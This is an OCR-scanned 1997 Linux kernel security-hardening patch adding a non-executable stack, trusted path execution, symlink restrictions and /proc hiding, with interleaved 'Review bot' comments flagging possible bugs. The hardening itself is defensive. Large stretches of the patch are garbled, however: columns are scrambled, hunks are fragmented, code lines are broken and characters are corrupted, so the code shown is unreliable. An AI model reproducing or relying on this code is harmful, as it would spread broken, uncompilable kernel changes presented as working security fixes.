[To prevent someone 
this fix does not allow non-root 


Only say Y if security 


so this is 


RICT 


= 


diff -ru linux-stock/arch/i386/config.in linux-patched/arch/i386/config.in 
--- linux-stock/arch/i386/config.in Sun May 12 21:17:23 1996 

+++ linux-patched/arch/i386/config.in Sun Nov 9 12:38:27 1997 

@@ -35,6 +35,15 @@ 

tristate ’Kernel support for ELF binaries’ CONFIG_BINFMT_ELF 

Lt "SCONFIG_EXPERIMENTAL" = "y" ]; then 

tristate ’Kernel support for JAVA binaries’ CONFIG_BINFMT_JAVA 

+ bool ’Non-executable user stack area (EXPERIMENTAL) ’ CONFIG _STACKEXEC 

+ if [ "SCONFIG_STACKEXEC" = "y" ]; then 

+ bool ’ Autodetect GCC trampolines’ CONFIG_STACKEXEC_AUTOENABLE 

+ bool ’ .og buffer overflow exploit attempts’ CONFIG_STACKEXEC_LOG 

+ fi 

+ bool ’ Restrict process table viewing (EXPERIMENTAL) ’ CONFIG_PROC_REST 
+ bool ’ Trusted path execution (EXPERIMENTAL) ’ CONFIG_TPE 

ne bool ’ Log untrusted path execution attempts (EXPERIMENTAL)’ CONFIG_TP 
+ bool ’ Split Network GIDs (EXPERIMENTAL)’ CONFIG_SPLIT_GID 

if ds 

bool '’Compile kernel as ELF - if your GCC is ELF-GCC’ CONFIG_KERNEL_ELF 
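Review bot: the CONFIG_TPE_LOG prompt is offered unconditionally right after CONFIG_TPE, whereas the STACKEXEC logging option is correctly nested inside `if [ "$CONFIG_STACKEXEC" = "y" ]; then ... fi`; wrap the TPE logging prompt the same way so it is only asked when trusted path execution is enabled. The process table restriction, TPE and split GID options are not i386-specific but are added only to arch/i386/config.in, so other architectures never see them; if that is intended (the article says several of these patches are x86-only), note it in the Configure.help text, otherwise the prompts belong in the generic fs and net config files.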
diff -ru linux-stock/arch/i386/defconfig linux-patched/arch/i386/defconfig 
--- linux-stock/arch/i386/defconfig Mon Sep 22 13:44:01 1997 
+++ linux-patched/arch/i386/defconfig Sun Nov. 9 12:38:23 1997 

@@ -24,6 +24,10 @@ 

CONFIG_SYSVIPC=y 

CONF IG_BINFMT_AOUT=y 

CONF IG_BINFMT_ELF=y 
+# CONFIG_STACKEXEC is not set 
+CONFIG_STACKEXEC_AUTOENABLE=y 
+CONFIG_STACKEXEC_LOG=y 
+CONFIG_SPLIT_GID=y 

CONFIG_KERNEL_ELF=y 
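Review bot: the defaults are inconsistent: `# CONFIG_STACKEXEC is not set` is immediately followed by `CONFIG_STACKEXEC_AUTOENABLE=y` and `CONFIG_STACKEXEC_LOG=y`, which config.in only prompts for when CONFIG_STACKEXEC=y, so a defconfig build carries dangling dependent symbols (the same pattern recurs further down with CONFIG_SYMLINK_FIX off and CONFIG_SYMLINK_LOG=y). Either default the parent options on, which matches the stated purpose of the patch set, or mark the dependents "is not set" as well.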


@e 


CONF IG_M386 
t+ CONFIG_M486 is not set 
-134,6 +138,8 @@ 
Filesystems 


is not set 


CONFIG_QUOTA is not set 
CONFIG_SYMLINK_FIX is not set 
+CONFIG_SYMLINK_LOG=y 


CONF IG_MINIX_FS=y 


E 


__LOG 
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# CONFIG_EXT_FS is not set 
CONF IG_EXT2_FS=y 
@@ -143,6 +149,9 @@ 


# CONFIG _VFAT_ 
UMSDOS_FS is not set 


# CONFIG_ 
CONF IG_PROC_F 


+CONFIG_ 
+CONFIG_ 


PE=y 
PE 


CONFIG_ 


+CONFIG_PROC_R 


FS is not set 


S=y 
ESTRICT=y 


_ LOG=y 
CONFIG_NFS_FS= 


y 
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ROOT_NFS is not set 
CONFIG_SMB FS is not set 


diff -ru linux-stock/arch/i386/kernel/head.S linux-patched/arch/i386/kernel/head.sS 


+++ 
@@ -400,10 +40 

.qu 

-quad 

-quad 
+#ifdef CONFIG_ 
+ -quad 
-quad 
ad 
ad 


t+#else 
ad 
ad 
ad 
ad 


endif 
Pa caiml eal 


-qu 


+++ 


@@ -423,6 +423, 


diff -ru linux-stock/arch/i386/kernel/signal 


ifdef CONFIG_ 
ad 0x00c09a0000000000 
diff -ru linux-stock/arch/i386/kernel/ptrace.c 
linux-stock/arch/i386/kernel/ptrace.c 
linux-patched/arch/i386/kernel/ptrace.c 

@@ -413,7 +413, 


0,17 @@ 


Oxc0c39a000000 
Oxc0c392000000 
STACKEXEC 
0x00cafa000000 
O0x00cb£2000000 
0x00cbda000000 
0x00cbd2000000 


0x00cbf£a000000 
0x00cb£2000000 
0x000000000000 
0x000000000000 


2*NR_TASKS, 8,0 
APM 


7 @@ 


10 @@ 


linux-stock/arch/i386/kernel/head.S Tue Aug 
linux-patched/arch/i386/kernel/head.S 


ad 0x0000000000000000 


Fh Fh 
Fh Fh 


Fh FH Fh Fh 
Fh FH Fh Fh 


fh Fh 
bh Fh 
h Fh 
h Fh 


0000 
0000 


addr == FS | 
addr == CS | 
data &= 
if (data 
if (data 
addr == EFL) 


5 09:19:53 1997 
Sun Nov 9 00:55:50 1997 


/* not used */ 

/* 0x10 kernel 1GB code at 0xC0000000 */ 
/* 0x18 kernel 1GB data at 0xC0000000 */ 
/* 0x23 user 2.75GB code at 0 */ 

/* Ox2b user 3GB data at 0 */ 

/* 0x32 user 3GB code at 0, DPL=2 */ 
/* Ox3a user 3GB stack at 0, DPL=2 */ 
/* 0x23 user 3GB code at 0x00000000 */ 
/* Ox2b user 3GB data at 0x00000000 */ 
/* not used */ 


not used */ 
space for LDT’s and TSS’s etc */ 
/* APM 


cs code */ 


Mon Aug 4 12:12:22 1997 
Sun Nov 9 00:55:50 1997 
| addr == GS || 
| addr == SS) { 
Oxffff; 
&& (data & 3) != 3) 
&& (data & 3) < 2) 
return —-EIO; 


{ /* flags. */ 


/* Do not allow the user to set the debug register for kernel 


address 
f(addr < 
iE 

if ( 


if 


retu 


space */ 
17) { 
addr EIP 
put_stack_lo 


put_stack_lo 


return —- 


(put_stack_ 


return - 
rn 0; 


linux-patched/arch/i386/kernel/ptrace.c 


&& (data & O0xF0000000) == 0xBO0000000) 

ng(child, CS*sizeof (long) -MAGICNUMBER, USER_HUGE_ 
ng(child, SS*sizeof (long) -MAGICNUMBER, USER_HUGE_ 
E10; 

long(child, sizeof (long) *addr-MAGICNUMBER, data) ) 
E10; 


-—-- linux-stock/arch/i386/kernel/signal.c Mon Aug 4 12:12:51 1997 
+++ linux-patched/arch/i386/kernel/signal.c Sun Nov 9 00:55:50 1997 
@@ -83,10 +83,10 @&@ 
#define COPY_SEG(x) \ 
if ( (context.x & Oxfffc) /* not a NULL selectors */ \ 
&& (context.x & 0x4) != 0x4 /* not a LDT selector */ \ 
- && (context.x & 3) != 3 /* not a RPL3 GDT selector */ \ 
+ && (context.x & 3) < 2 /* not a RPL3 or RPL2 GDT selector */ \ 
) goto badframe; COPY (x); 
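Review bot: widening the rejection test from `(context.x & 3) != 3` to `(context.x & 3) < 2` makes COPY_SEG accept any GDT selector with RPL 2, not only the two DPL=2 descriptors this patch adds (0x32 code and 0x3a stack, per the head.S comments above); the relaxed check is only as safe as the absence of other DPL 2 entries in the GDT, and the updated comment should state that assumption explicitly.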


.c linux-patched/arch/i386/kernel/signal.c 
#define COPY_SEG_STRICT(x) \ 
-if (!(context.x & Oxfffc) || (context.x & 3) != 3) goto badframe; COPY (x); 
+if (!(context.x & Oxfffc) || (context.x & 3) < 2) goto badframe; COPY (x); 
struct sigcontext_struct context; 
struct pt_regs * regs; 
@@ -167,16 +167,20 @@ 
unsigned long * frame; 
frame = (unsigned long *) regs-—>esp; 
7 if (regs->ss != USER_DS && sa->sa_restorer) 
+ if (regs->ss != USER_DS && regs->ss != USER_HUGE_SS && sa->sa_restorer) 
frame = (unsigned long *) sa->sa_restorer; 
frame -= 64; 
if (verify_area (VERIFY_WRITE, frame, 64*4) ) 
do_exit (SIGSEGV) ; 
/* set up the "normal" stack seen by the signal handler (iBCS2) */ 
+#ifdef CONFIG_STACKEXEC 
+ put_user((unsigned long)MAGIC_SIGRETURN, frame); 
+#else 
define __CODE ((unsigned long) (frame+24) ) 
define CODE(x) ((unsigned long *) ((x)+__CODE) ) 
put_user (__CODE, frame) ; 
ttendif 
if (current-—>exec_domain && current-—>exec_domain->signal_invmap) 
put_user (current-—>exec_domain->signal_invmap[signr], frametl); 
else 
@@ -204,19 +208,17 @@ 


/* non-iBCS2 extensions.. 
put_user (oldmask, 


, 


frame+22); 


put_user(current-—>tss.cr2, 


frame+23); 


+#ifndef CONFIG_STACKEXEC 
/* set up the return code... */ 
put_user (0x0000b858, CODE(0)); /* popl %eax ; movl $,%eax */ 
put_user (0x80cd0000, CODE(4)); /* int $0x80 */ 
put_user(__NR_sSigreturn, CODE(2)); 
#undef _ CODE 
#undef CODE 
+#endif 
/* Set up registers for signal handler */ 
= regs->esp = (unsigned long) frame; 
7 regs->eip = (unsigned long) sa->sa_handler; 
= regs->cs = USER_CS; regs->ss = USER_DS; 
a regs->ds = USER_DS; regs->es = USER_DS; 
- regs->gs = USER_DS; regs->fs = USER_DS; 
+ start_thread(regs, (unsigned long)sa->sa_handler, (unsigned long) frame) ; 
regs->eflags &= ~TF_MASK; 


} 


diff -ru linux-stock/arch/i386/kernel/traps.c linux-patched/arch/i386/kernel/traps.c 
linux-stock/arch/i386/kernel/traps.c Mon Aug 11 13:37:24 1997 


+++ linux-patched/arch/i386/kernel/traps.c Sun Nov 9 00:55:50 1997 
@@ -117,7 +117,7 @@ 

esp = (unsigned long) &regs-—>esp; 

ss = KERNEL_DS; 
= if ((regs->eflags & VM_MASK) || (3 & regs->cs) == 3) 
+ if ((regs->eflags & VM_MASK) || (3 & regs->cs) >= 2) 

return; 
if (regs->cs & 3) { 
sp = regs->esp; 

@@ -193,11 +193,82 @@ 


asmlinkage void do_ge 


{ 
+#ifdef CONFIG_STACK 


neral_protection(struct pt_regs * regs, long error_code) 


EXEC 
+#endif 


unsigned long retaddr; 


if (regs->eflags & VM_MASK) { 


handle_vm86_fault ((struct vm86_regs *) 


return; 


} 


+#ifdef CONFIG_STACKEXEC 
+/* Check if it was return from a signal handler 


regs, error_code); 


*/ 


+ if (regs->cs == USER_CS || regs->cs == USER_HUGE_CS) 

+ if (get_seg_byte(USER_DS, (char *)regs->eip) == 0xC3) 

+ if (!verify_area(VERIFY_READ, (void *)regs->esp, 4)) 

te if ((retaddr = get_seg_long(USER_DS, (char *)regs->esp)) == 
+ MAGIC_SIGRETURN) { 


Call sys_sigreturn() to restore the context. 


to convert sys_sigreturn () 


+ * pt_regs, making this faster... 

+ */ 

+ regs-—>esp += 8; 

+ __asm__("movl %3,%%esi;" 

e "Subl %1,%%esp;" 

+ "movl %2,%%ecx;" 

+ "movl S%Sesp,%%edi;" 

+ "cld; rep; movsl;" 

+ "call sys_sigreturn;" 
+ "leal %3,%%edi;" 

a "addl %1,%%edi;" 

+ "movl S%Sesp,%%Sesi;" 

+ "movl (%%edi),%%edi;" 
+ "movl %2,%%ecx;" 

+ "cld; rep; movsl;" 

+ "movl S%Sesi,s%esp" 


+/* %Seax is returned separately */ 


+ "=a" (regs—>eax) 

+ "i" (sizeof (*regs)), 

+ "i" (sizeof (*regs) >> 2), 

ee Nin" (regs) 

re Nox", wo b.auen Wea Wala, MOE 7 
ate return; 

+ } 

+#ifdef CONFIG _STACKEXEC_LOG 


+/* 
* Check if we’re returning to the stack area, 
* when attempting to exploit a buffer overflow. 


*/ 


else if (regs->cs == USER_CS && 
(retaddr & 0xF0000000) 0xBO0000000) 


endif 
endif 


die_if_kernel("g 


It would definitely be better 


into an inline function accepting a pointer to 


"memory") ; 


which is only likely to happen 


security_alert ("buffer overflow"); 


neral protection", regs,error_code) ; 


+#if defined (CONFIG_STACK 
+/* 

* Switch to the original huge code segment 
* stack for this entire process), 
* except for call %esp. 


EXEC) 


+ */ 
+ if (regs->cs == USER_CS) 

+ if (get_seg_byte(USER_DS, (char *)regs-—>eip) 
+ (get_seg_byte(USER_DS, 


&& defined (CONFIG_STACK 


(char *) (regs->eip + 1)) 


4 


EC_AUTO 


ENABLE) 


(and allow code execution on the 
if the faulty instruction is a call %reg, 


OxFF && 
& OxD8) 


OxDO && 




+ } 
+#endif 


current-—>tss.error_code 
current—>tss.trap_no 
force_sig (SIGS! 
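Review bot: the `(retaddr & 0xF0000000) == 0xB0000000` test hardcodes where the user stack lives under a 0xC0000000 TASK_SIZE, and the ptrace.c hunk repeats the same constant on `data`; define it once beside TASK_SIZE in processor.h so the two cannot drift apart. The comment should also make clear that this branch only logs: under CONFIG_STACKEXEC the return into the stack is refused by the code segment limit, and `security_alert("buffer overflow")` is compiled in only with CONFIG_STACKEXEC_LOG.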
linux-stock/arch/i386/mm/fault.c linux-patched/arch/i386/mm/fault. 
linux-stock/arch/i386/mm/fault.c 


diff -ru 
get_seg_byte 


current-— 


regs->cs 
return; 


EGV, 


10 


(USER_DS, (char *) (regs->eip + 1)) != OxD4) { 
>flags |= PF_STACKEXEC; 
= USER_HUGE_CS; regs->ss = USER_HUGE_SS; 


3% 


error _code; 


current); 


+++ linux-patched/arch/i386/mm/fault.c 
@@ -44,6 +44,7 @@ 
unsigned long page; 
int write; 
“ if ((regs->cs & 3) >= 2) 
/* get the address */ 
__asm__("movl %%cr2,%0":"=r" 


down (&mm->mmap_sem) ; 


Sat Aug 16 22:21:20 1997 


Sun Nov 


error_code 


4; 


(address) ); 


9 00:55:50 1997 


EC; 


diff -ru linux-stock/fs/binfmt_aout.c linux-patched/fs/binfmt_aout.c 
-—--— linux-stock/fs/binfmt_aout.c Wed Oct 15 14:56:43 1997 
+++ linux-patched/fs/binfmt_aout.c Tue Nov 11 00:38:48 1997 
@@ -315,6 +315,7 @@ 
current-—>suid = current-—>euid = current-—>fsuid = bprm->e_uid; 
current-—>sgid = current-—>egid = current->fsgid = bprm->e_gid; 
current-—>flags &= ~PF_FORKNOEXEC; 
+ if (N_FLAGS (ex) & F_STACKEXEC) current->flags |= PF_STACKEX 
if (N_MAGIC(ex) == OMAGIC) { 
#ifdef _ alpha__ 
do_mmap (NULL, N_TXTADDR(ex) & PAGE_MASK, 
diff -ru linux-stock/fs/binfmt_elf.c linux-patched/fs/binfmt_elf.c 
--- linux-stock/fs/binfmt_elf.c Wed Oct 15 14:56:43 1997 
+++ linux-patched/fs/binfmt_elf.c Tue Nov 11 01:02:05 1997 
@@ -55,7 +55,10 @@ 
#define ELF_PAGESTART(_v) ((_v) & ~ (unsigned long) (ELF_EXEC_PAGESIZE-1) ) 
define ELF_PAGEOFFSET(_v) ((_v) & (ELF_EXEC_PAGESIZE-1) ) 


static struct linux_bi 


nfmt elf_format 


= 


+#ifndef CONFIG_STACKEXEC 
+static 
+#endif 
+struct linux_binfmt elf_format = { 
ifndef MODULE 
NULL, NULL, load_elf_binary, load_elf_library, elf_core_dump 
else 
@@ -662,6 +665,7 @@ 
current-—>suid = current-—>euid = current-—>fsuid = bprm->e_uid; 
current-—>sgid = current-—>egid = current->fsgid = bprm->e_gid; 
current->flags &= ~PF_FORKNOEXEC; 
+ if (elf_ex.e_flags & EF_STACKEXEC) current->flags |= PF_STACKEXEC; 
bprm->p = (unsigned long) 
create_elf_tables((char *)bprm->p, 


bprm->argc, 


diff -ru linux-stock/fs/exec.c linux-patched/fs/exec.c 


linux-stock/fs/exec.c 


+++ 
@e 
} 


linux-patched/fs/exec.c 
-475,6 +475,8 @@ 


current-—>comm[i] 


/* Release all of the old mmap stuff. 
(exec_mmap () ) 


it 


@e 


return —- 


-650,12 +652,30 @@ 


= IN\O'S 


ENOM 


EM; 


current->flags &= ~PF_STACKEX 


EC; 


ey 


Wed Oct 15 14:56:43 1997 
Tue Nov 11 12:59:51 1997 
int do_execve(char * filename, char ** argv, char ** envp, struct pt_regs * regs) 
{ 
struct linux_binprm bprm; 
+ struct inode *dir; 
+ const char *basename; 
+ int namelen; 
int retval; 


int i; 
bprm.p = PAGE_SIZE*MAX_ARG_PAGES-sizeof (void *); 
for (i=0 ; i<MAX_ARG PAGES ; itt) /* clear page-table */ 


bprm.page[i] = 0; 
+#ifdef CONFIG_TPE 
- /* Check to make sure the path is trusted. If the directory is root 
+ * owned and not group/world writable, it’s trusted. Otherwise, 

+ * return -EACCES and optionally log it 


4 * / 
+ dir_namei(filename, &namelen, &basename, NULL, é&dir); 
a if (dir->i_mode & (S_IWGRP | S_IWOTH) || dir->i_uid) 


+ { 
+#ifdef CONFIG_TPE_LOG 
+ security_alert ("Trusted path execution violation"); 
+#endif /* CONFIG_TPE_LOG */ 
+ return —EACCES; 
a } 
+#endif /* CONFIG_TPE */ 
retval = open_namei(filename, 0, 0, &bprm.inode, NULL); 
if (retval) 
return retval; 


=) 
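Review bot: the result of `dir_namei(filename, &namelen, &basename, NULL, &dir)` is discarded, so on a failed lookup `dir` is not a valid inode when the next line reads `dir->i_mode` and `dir->i_uid`; test the return value and propagate it. The directory inode that dir_namei() does hand back is also never released: neither the `-EACCES` branch nor the fall-through to open_namei() calls `iput(dir)`, so every execve leaks a reference. The comment should additionally say that only the executable's immediate directory is inspected (root-owned, no group/world write bit), not the path components above it.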


diff -ru linux-stock/fs/namei.c linux-patched/fs/namei.c 
-—-- linux-stock/fs/namei.c Sat Aug 16 16:23:19 1997 
+++ linux-patched/fs/namei.c Tue Nov 11 00:44:51 1997 


@@ -19,6 +19,7 @@ 

include <linux/fcntl.h> 
include <linux/stat.h> 
include <linux/mm.h> 
+#include <linux/config.h> 


define ACC_MODE(x) ("\000\004\002\006"[ (x) &£O_ACCMOD 


Gl 
aa 
~~ 


@@ -207,6 +208,23 @@ 

*res_inode = inode; 

return 0; 

} 

+#ifdef CONFIG_SYMLINK_FIX 
+/* 
+ * Don’t follow links that we don’t own in +t directories, unless the link 
+ * is owned by root. 
re 
th if (S_ISLNK (inode->i_mode) && (dir->i_mode & S_ISVTX) && 
+ inode->i_uid && 
+ current->fsuid != inode->i_uid) { 
+#ifdef CONFIG_SYMLINK_LOG 
+ security_alert ("symlink"); 


+#endif 

+ iput (dir) ; 

+ iput (inode) ; 

+ *res_inode = NULL; 
+ return —EPERM; 

+ } 

+#endif 


return inode->i_op->follow_link (dir, inode, flag,mode, res_inode) ; 


} 
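Review bot: the condition exempts links owned by root (`inode->i_uid` zero) and links owned by the caller (`current->fsuid`), but unlike the hard-link hunk later in this file it has no fsuser() exemption, so a root process is refused as well. That is presumably intended, since privileged processes are what such links are aimed at, but the block comment only says "unless the link is owned by root" and should spell out that root followers are not exempt.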


@@ -216,8 +234,13 @@ 
* dir_namei() returns the inode of the directory of the 
* specified name, and the name within that directory. 
* / 
+#ifdef CONFIG_TPE 
tint dir_namei(const char *pathname, int *namelen, const char **name, 
+ struct inode * base, struct inode **res_inode) 
+#else 
static int dir_namei(const char *pathname, int *namelen, const char **name, 
struct inode * base, struct inode **res_inode) 
+#endif /* CONFIG_TPE */ 


char c; 
const char * thisname; 
@@ -787,6 +810,22 @@ 
iput (dir); 
return —-EPERM; 


} 
+#ifdef CONFIG_SYMLINK_FIX 
+/* 
+ * Don’t allow non-root users to create hard links to files they don’t own 
+ * in a +t directory. 


+ */ 
+ if ((dir->i_mode & S_ISVTX) && 

+ current->fsuid != oldinode->i_uid && 
+ 'fsuser()) f 


+#ifdef CONFIG_SYMLINK_LOG 
+ security_alert ("hard link"); 


+#endif 

4 iput (oldinode) ; 
fn iput (dir); 

4 return -EPERM; 
+#endif 


if (IS_RDONLY(dir)) { 

iput (oldinode) ; 

iput (dir); 
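Review bot: no `}` closing the `if ((dir->i_mode & S_ISVTX) && ...)` block appears before `+#endif` in the hunk as extracted; confirm the brace is present, otherwise the `#endif` sits inside the block. The fsuser() exemption here, which the symlink check above does not have, deserves a sentence in the comment explaining why root may still hard-link files it does not own in a +t directory.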

diff -ru linux-stock/fs/proc/base.c linux-patched/fs/proc/base.c 
---— linux-stock/fs/proc/base.c Wed Feb 21 01:26:09 1996 

+++ linux-patched/fs/proc/base.c Sun Nov. 9 10:53:19 1997 
@@ -74,7 +74,11 @@ 


struct proc_dir_entry proc_pid = { 
PROC_PID_INO, 5, "<pid>", 
- S_IFDIR | S_IRUGO | S_IXUGO, 2, 0, O, 
+#ifdef CONFIG_PROC_RESTRICT 
a S_IFDIR | S_IRUSR | S_IXUSR, 2, 0, O, 
+#else 
st? S_IFDIR | S_IRUGO | S_IXUGO, 2, 0, O, 
+#endif /* CONFIG_PROC_RESTRICT */ 
0, &proc_base_inode_operations, 
NULL, proc_pid_fill_inode, 
NULL, &proc_root, NULL 
diff -ru linux-stock/fs/proc/inode.c linux-patched/fs/proc/inode.c 


--- linux-stock/fs/proc/inode.c Sat Nov 30 02:21:21 1996 
+++ linux-patched/fs/proc/inode.c Sun Nov 9 10:58:06 1997 
@@ -153,7 +153,11 @@ 
if ('p || i >= NR_TASKS) 
return; 
if (ino == PROC_ROOT_INO) { 


- inode->i_mode = S_IFDIR | S_IRUGO | S_IXUGO; 
+#ifdef CONFIG _PROC_RESTRICT 
+ inode->i_mode 
t+#else 
+ inode->i_mode = S_IFDIR | S_IRUGO | S_IXUGO; 
+#endif /* CONFIG _PROC_RESTRICT */ 

inode->i_nlink = 2; 

for (i = 1; i < NR_TASKS ; itt) 

if (task[i]) 


S_IFDIR | S_IRUSR | S_IXUSR; 
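Review bot: giving PROC_ROOT_INO mode `S_IFDIR | S_IRUSR | S_IXUSR` on a root-owned directory stops every non-root user from traversing /proc at all, including the /proc/<pid> directories that the base.c hunk deliberately leaves readable by their owner; if the aim is to hide other users' processes, the per-pid restriction already does that and the root directory can keep at least the S_IXUGO bits.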


@@ -171,7 +175,11 @@ 
inode->i_nlink = 2; 
break; 
case PROC_SCSTI: 
+#ifdef CONFIG _PROC_RESTRICT 
+ inode->i_mode 
+#else 


S_IFDIR | S_IRUSR | S_IXUSR; 


inode->i_mode 
+#endif /* CONFIG _PROC_RESTRICT */ 


S_IFDIR | S_IRUGO | S_IXUGO; 


inode->i_nlink = 2; 
inode->i_op = &proc_scsi_inode_operations; 
break; 


@@ -181,7 +189,11 @@ 


GJ 


inode->i_size (MAP_NR(high_memory) << PAGE_SHIFT) + PAG 


SIZE; 


break; 
case PROC_PROFILE: 
= inode->i_mode 
+#ifdef CONFIG _PROC_RESTRICT 
+ inode->i_mode = S_IFDIR | S_IRUSR | S_IXUSR; 
+#else 
+ inode->i_mode 
+#endif /* CONFIG _PROC_RESTRICT */ 


1 


S_IFREG | S_IRUGO | S_IWUSR; 


ll 
is 
4 
ra 


DIR | S_IRUGO | S_IXUGO; 


inode->i_op = &proc_profile_inode_operations; 
inode->i_size = (l+prof_len) * sizeof(unsigned long); 
break; 
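Review bot: the PROC_PROFILE case now assigns `S_IFDIR | S_IRUSR | S_IXUSR` under CONFIG_PROC_RESTRICT, but the line being removed set `S_IFREG | S_IRUGO | S_IWUSR`; /proc/profile is a regular file (it gets `proc_profile_inode_operations` and a computed i_size two lines later), so the restricted mode should be `S_IFREG | S_IRUSR | S_IWUSR` and the #else branch must restore the original S_IFREG value exactly, otherwise the node changes type depending on the config option.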
@@ -203,7 +215,11 @@ 
return; 
case PROC_PID_MEM: 
inode->i_op = &proc_mem_inode_operations; 


= inode->i_mode = S_IFREG | S_IRUSR | S_IWUSR; 
+#ifdef CONFIG_PROC_RESTRICT 
+ inode->i_mode 
+#else 
+ inode->i_mode 
+#endif /* CONFIG_PROC_RESTRICT */ 
return; 
case PROC_PID_CWD: 
case PROC_PID_ROOT: 
diff -ru linux-stock/include/asm-i386/processor.h linux-patched/include/asm-i386/processor. 


ll 
n 


_IFDIR | S_IRUSR | S_IXUSR; 


S_IFDIR | S_IRUGO | S_IXUGO; 


---— linux-stock/include/asm-i386/processor.h Tue Mar 11 13:52:29 1997 
+++ linux-patched/include/asm-i386/processor.h Tue Nov 11 00:47:04 1997 
@@ -9,6 +9,8 @@ 


include <asm/vm86.h> 

include <asm/math_emu.h> 
+#include <linux/binfmts.h> 
+#include <linux/config.h> 


/* 
* System setup and hardware bug flags.. 
@@ -41,6 +43,15 @@ 


define TASK_SIZI 


GJ 


(OxCOOO0Q000UL) 


+#if£ defined (CONFIG _STACKEXEC) && defined (CONFIG _BINFMT_ELF) 
textern struct linux_binfmt elf format; 

+#define MMAP ADDR ( \ 
+ current->binfmt == &elf_format && \ 
+ !(current->flags & PF_STACKEXEC) \ 
+ ? O0x00110000UL \ 

ae : TASK SIZE / 3 ) 

+#endif 


/* 
* Size of io_bitmap in longwords: 32 is ports 0O-Ox3ff. 
+f 

@@ -134,14 +145,6 @@ 

#define alloc_kernel_stack () __get_free_page (GFP_KERNEL) 
#define fr 


_kernel_stack (page) 
EY 


14 


Pag 


( (page) ) 


-static inline void start_thread(struct pt_regs * regs, 


unsigned long eip, 


Pp) 
at 
7 regs->cs = USER_CS; 
= regs->ds regs->es regs->ss regs->fs regs->gs USER_DS; 
- regs->eip = eip; 
- regs->esp = esp; 
—} 
/* 
* Return saved PC of a blocked thread. 
ua 
@@ -151,3 +154,25 @@ 
} 
endif /* __ASM_1386_PROCESSOR_H */ 


if defined(current) 
define _ START_THRE 


&& 
AD 


!'defined (__START_THREAD) 


+static inline void start_thread(struct pt_regs * regs, 


unsigned long eip, 


P) 

+{ 

+#ifdef CONFIG_STACKEXEC 

+ if (current->flags & PF_STACKEXEC) { 

as regs->cs = USER_HUGE_CS; regs->ss = USER_HUGE_SS; 
SE } else { 

+ regs->cs = USER_CS; regs->ss = USER_DS; 

+ } 

+ regs->ds regs->es regs->fs regs->gs USER_DS; 
+#else 

+ regs->cs = USER_CS; 

+ regs->ds regs->es regs->fs regs->gs regs->ss USER_DS; 
t#endif 

+ regs->eip = eip; 

+ regs->esp = esp; 


+#endif /* __START_THREAD */ 
diff -ru linux-stock/include/asm-i386/segment.h 
--- linux-stock/include/asm-i386/segment.h Tue Apr 
+ linux-patched/include/asm-i386/segment.h Tue Nov 
@@ -1,11 +1,27 @@ 
ifndef _ASM_SEGMENT_H 
define _ASM_SEGMENT_H 
+#include <linux/config.h> 
define KERNEL CS 0x10 
define KERNEL DS 0x18 
define USER_CS 0x23 
define USER_DS O0x2B 
+#ifdef CONFIG_STACKEXEC 
+#define USER_HUGE_CS 0x32 
+#define USER_HUGE_SS Ox3A 
t+t#else 
+#define USER_HUGE_CS 0x23 
+#define USER_HUGE_SS 0x2B 
t#endif 
4/* 
+ * Magic address to return to the kernel from signal handlers, 
+ * beyond user code segment limit will do. 
+ */ 


9 00:35:29 1996 
11 00:47:13 1997 


any address 


unsigned long es 


unsigned long es 


linux-patched/include/asm-i386/segment.h 




diff -ru 


+ 
@ 


+ 


+ 
@ 


#ifndef 


++ 


aleiR 
de 


++ 


/* 
#de 


diff 


++ 


endif 
diff 


__ASSEMBLY__ 


152, 


fine F_STACKEXEC 


'defined 


—ru 


ETURN 


linux-stock/incl 
linux-stock/include/linux/a.out.h 
linux-patched/include/linux/a.out.h Tue Nov 11 00:47:21 1997 
@ -37,6 +37,9 @@ 
M_MIPS2 = 


(N_MAGIC) 
Fine N_MAGIC (exec) 


+#define MAGIC_SIGR 


15 


OxC1428571 


Sat Aug 17 11:19:28 1996 


/* MIPS R6000/R4000 binary */ 


nstants for the N_FLAGS field */ 
Executable stack area forced */ 


1 Ah 


((exec).a_info & Oxffff) 


linux-stock/incl 
linux-stock/include/] 


inux/elf.h 


fine EM_ALPHA 


fine EF_STACKEXEC 


Fine DT_NULL 
-ru 


@ -78,6 +78,27 @@ 


\ 


de 
de 


linux-patched/incl 
@ -269,6 +269,8 


(( (addr) 
(( (addr) 


linux-stock/incl 
linux-stock/include/linux/kernel.h 
linux-patched/include/linux/kernel.h 


>> 16) 
>> 24) 


+#define security_alert (msg) 
static unsigned long warning_time = 


linux-patched/include/linux/elf.h 
@ -57,6 +57,9 @@ 


0x9026 


+/* Constants for the e_flags field */ 
Executable stack area forced */ 


A f% 


0 


& Oxff), \ 
& Oxff) 


{ \ 


if 


printk ( 


} else if 


(no_flood_yet) 
warning_time = 


printk ( 


endif /* _ KERNEL _ 


fine SI_LOAD SHIFT 
-ru linux-stock/incl 
linux-stock/include/linux/sched.h 


@@ 
fine PF_USEDFPU 
fine PF_DTRACE 


Py), 


+/* Make sure at least one minute passed since the 
(!warning_time 
warning_time = 


jiffies; 
\ 
KERN_ALERT \ 
"Possible 
KERN ALERT \ 
"Process %S 


current-—>comm, 
current-—>uid, 
{ \ 
jiffies; 
\ 

KERN_ALERT \ 


16 


0x00100000 
0x00200000 


lude/linux/kernel 


(pid %d, 


Sat Aug 10 00:03:15 1996 
Tue Nov 11 00:47:39 1997 


0, 


no_flood_yet = 1; 


uid %d, 
current->pid, \ 


current->euid); \ 


no_flood_yet = 


no_flood_yet = 


Ope OX 


{ \ 
\ 


"msg " exploit attempt:\n" \ 


euid %d).\n", \ 


Wed Oct 15 15:22:05 1997 


/* Process used the FPU this quantum 


/* delayed trace 


lude/linux/sched.h Tue Nov 11 00:47:48 1997 


(used on m68k) 


ude/linux/elf.h linux-patched/include/linux/elf.h 


last warning logged */ \ 
jiffies - warning_time > 60 * HZ) 


"More possible " msg " exploit attempts follow.\n"); 


Mi, 


lude/linux/a.out.h linux-patched/include/linux/a.out.h 


This is the info that is needed to parse the dynamic section of the file */ 


L.h linux-patched/include/linux/kernel.h 
Thu Aug 14 10:05:47 1997 
Tue Nov 11 00:47:44 1997 


\ 


lude/linux/sched.h linux-patched/include/linux/sched.h 


(SMP only) 


aes 
+#define PF_STACKEXEC 0x01000000 /* Executable stack area forced */ 
/* 
* Limit the stack by to some sane default: root can always 
* increase this limit if needed.. 8MB seems reasonable. 


@@ -490,6 +492,9 @@ 


#define for_each_task(p) \ 
for (p = &init_task ; (p = p->next_task) != &init_task ; ) 


+/* x86 start_thread() */ 
+#include <asm/processor.h> 


#endif /* _ KERNEL * / 


diff -ru linux-stock/kernel/sched.c linux-patched/kernel/sched.c 
